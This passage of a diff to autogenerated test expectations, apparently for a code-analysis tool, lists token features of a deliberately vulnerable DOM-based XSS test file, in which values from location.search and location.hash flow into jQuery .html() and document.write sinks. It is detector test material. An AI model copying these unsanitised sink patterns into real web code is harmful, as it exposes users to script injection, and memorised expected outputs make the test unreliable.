autogenerated/Xss/DomBasedXss/tst.js:411:20:411:32 | target.taint9 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:411:20:411:32 | target.taint9 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:411:20:411:32 | target.taint9 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:411:20:411:32 | target.taint9 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:411:20:411:41 | target. ... "safe" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:411:20:411:41 | target. ... "safe" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:411:20:411:41 | target. ... "safe" | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:411:20:411:41 | target. ... "safe" | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:411:20:411:41 | target. ... "safe" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:411:27:411:32 | taint9 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:411:27:411:32 | taint9 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:411:27:411:32 | taint9 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:411:27:411:32 | taint9 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:411:27:411:32 | taint9 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:411:36:411:41 | "safe" | assignedToPropName | taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:411:36:411:41 | "safe" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:411:36:411:41 | "safe" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:411:36:411:41 | "safe" | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:411:36:411:41 | "safe" | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:411:36:411:41 | "safe" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:3 | $ | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:11 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:11 | $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:11 | $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:11 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:11 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:11 | exceptional return of $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:11 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:16 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:16 | $('myId').html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:16 | $('myId').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:16 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:31 | $('myId ... taint9) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:31 | $('myId ... taint9) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:31 | $('myId ... taint9) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:31 | $('myId ... taint9) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:31 | $('myId ... taint9) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:31 | exceptional return of $('myId ... taint9) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:31 | exceptional return of $('myId ... taint9) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:31 | exceptional return of $('myId ... taint9) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:31 | exceptional return of $('myId ... taint9) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:412:3:412:31 | exceptional return of $('myId ... taint9) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:412:5:412:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:412:5:412:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:412:5:412:10 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17513,6 +121820,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:412:5:412:10 | 'myId' | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:412:5:412:10 | 'myId' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:412:5:412:10 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:412:13:412:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:412:13:412:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:412:13:412:16 | html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:412:13:412:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:412:13:412:16 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:412:18:412:23 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:412:18:412:23 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:412:18:412:23 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:412:18:412:23 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:412:18:412:23 | target | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:412:18:412:30 | target.taint9 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:412:18:412:30 | target.taint9 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:412:18:412:30 | target.taint9 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17520,6 +121837,97 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:412:18:412:30 | target.taint9 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:412:18:412:30 | target.taint9 | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:412:18:412:30 | target.taint9 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:412:25:412:30 | taint9 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:412:25:412:30 | taint9 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:412:25:412:30 | taint9 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:412:25:412:30 | taint9 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:412:25:412:30 | taint9 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:415:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:415:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:415:0 | this | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:415:0 | this | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:415:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:425:1 | 'arguments' object of function hash2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:425:1 | 'arguments' object of function hash2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:425:1 | 'arguments' object of function hash2 | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:425:1 | 'arguments' object of function hash2 | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:425:1 | 'arguments' object of function hash2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:425:1 | exceptional return of function hash2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:425:1 | exceptional return of function hash2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:425:1 | exceptional return of function hash2 | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:425:1 | exceptional return of function hash2 | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:425:1 | exceptional return of function hash2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:425:1 | functio ... OT OK\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:425:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:425:1 | functio ... OT OK\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:425:1 | return of function hash2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:425:1 | return of function hash2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:425:1 | return of function hash2 | enclosingFunctionBody | payload window location hash substr 1 document write payload match window location hash match /hello (\\w+)/ match document write match 1 1 document write window 1 location hash split # 1 | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:425:1 | return of function hash2 | enclosingFunctionName | hash2 | +| autogenerated/Xss/DomBasedXss/tst.js:415:1:425:1 | return of function hash2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:415:10:415:14 | hash2 | contextFunctionInterfaces | 